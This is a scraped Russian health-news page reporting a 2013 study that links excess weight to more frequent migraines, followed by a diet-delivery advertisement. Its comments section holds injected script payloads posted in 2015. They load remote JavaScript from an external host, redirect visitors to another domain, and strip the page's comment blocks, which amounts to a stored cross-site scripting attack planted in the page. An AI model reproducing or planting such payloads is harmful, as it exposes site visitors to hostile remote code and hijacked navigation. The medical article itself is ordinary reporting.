Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем больше вес, тем хуже ...  >>  Чем больше вес, тем хуже головная боль
 
Обратная связь
 

Чем больше вес, тем хуже головная боль

Размер шрифта
18 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Иванникова
Здоровье инфо
  • google_analytics: false
  • Нравится

У вас болит голова? Во всем виноват лишний вес! Об этом говорят результаты нового исследования!

Чем больше вес, тем хуже головная боль

В исследовании приняли участие 3 800 взрослых добровольцев, было доказано, что тучные люди чаще страдают от мигрени.

Мигрень условно делят на эпизодическую, которая возникает несколько раз в месяц, и хроническую, которая беспокоит более 15 дней в месяц. Симптомы могут включать тошноту, рвоту и чувствительность к свету и звуку. Более 10% населения страдает от таких симптомов. В данном исследовании была выявлена закономерность, которая главным образом касалась женщин, а также лиц моложе 50 лет. Была выявлена взаимосвязь избыточного веса и частоты приступов мигрени.
«Данное исследование не доказывает, что ожирение способствует развитию мигрени, но показывает, что тучных людей головная боль беспокоит чаще», – говорит главный исследователь Барбара Ли Петерлин, руководитель Центра изучения головных болей университета Джонса Хопкинса в Балтиморе. «Эти результаты лишний раз показывают, что врачи должны пропагандировать здоровый образ жизни пациентам с эпизодической мигренью. Необходимо провести ряд независимых исследований для оценки эффективности снижения веса», – говорит Петерлин. Исследование было опубликовано 11 сентября 2013 года в журнале «Неврология». Также исследователи представили полученные результаты на Международном конгрессе изучения головной боли в Бостоне.
Доктор Гретхен Тиетжен, руководитель отдела изучения головной боли университета Толедо в Огайо, сказала: «Тот факт, что исследователям удалось подтвердить наличие взаимосвязи между увеличением веса и частотой приступов мигрени, дает нам определенную надежду в поиске новых лекарств». Она указала на то, что по-прежнему не известно, что именно является первичным звеном: ожирение или мигрень. Если человека часто беспокоят приступы мигрени, он начинает постоянно принимать различные препараты, например, амитриптилин или вальпроевую кислоту, которые могут вызвать прибавку в весе. Возможная связь между возникновением ожирения и мигрени обсуждается до сих пор. По одной из версий считается, что в избытке жировой ткани присутствуют особые молекулы, которые попадая в кровь вызывают развитие местного воспаления. Доктор Гретхен Тиетжен обращает внимание, что в старшем возрасте гендерные различия в распределении жировой ткани теряются. Поэтому, опираясь на эти данные, можно объяснить такую зависимость увеличения веса и частоты возникновения мигрени у молодых пухлых женщин, чем у более худых сверстниц. С другой стороны, Тиетжан отмечает, что недавно были получены данные об особенностях строения гипоталамуса у пациентов с хронической мигренью. Эта часть мозга отвечает за работу многих эндокринных органов и чувство насыщения, и при ее патологии, аппетит может нарушаться. Доктор Тиетжен приводит данные недавних исследований, куда были включены пациенты после перенесенных оперативных методов лечения ожирения. Хотя в этих исследованиях и были получены данные о снижении частоты возникновения приступов мигрени на фоне снижения веса, говорить об их достоверности пока рано, поскольку данные исследования были пилотными и включали в себя небольшое количество пациентов. Вполне возможно, что большее значение имеет изменение образа жизни, а не сама потеря веса. Люди, отказываясь от приема алкогольных напитков, курения, потребления высококалорийных и соленых продуктов, проводя больше времени на свежем воздухе, исключали из своей жизни провоцирующие мигрень факторы. Изменение рациона, отказ от потребления определенных продуктов снижает появление головной боли.  Доктор Петерлин предположила, что в будущем, изменение образа жизни и отказ от вредных привычек будет способствовать не только снижению частоты возникновения приступов, но и снижению дозы препаратов, что также положительно отразиться на снижении веса.

Если вы хотите реально похудеть, то специально для вас создана «Диета Елены Малышевой»! Уже готовая еда будет доставлена в любое удобное для вас время и место! Вам останется только есть и худеть.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Чтобы худеть, надо есть. Что есть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Какое мороженное съесть, чтобы похудеть
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.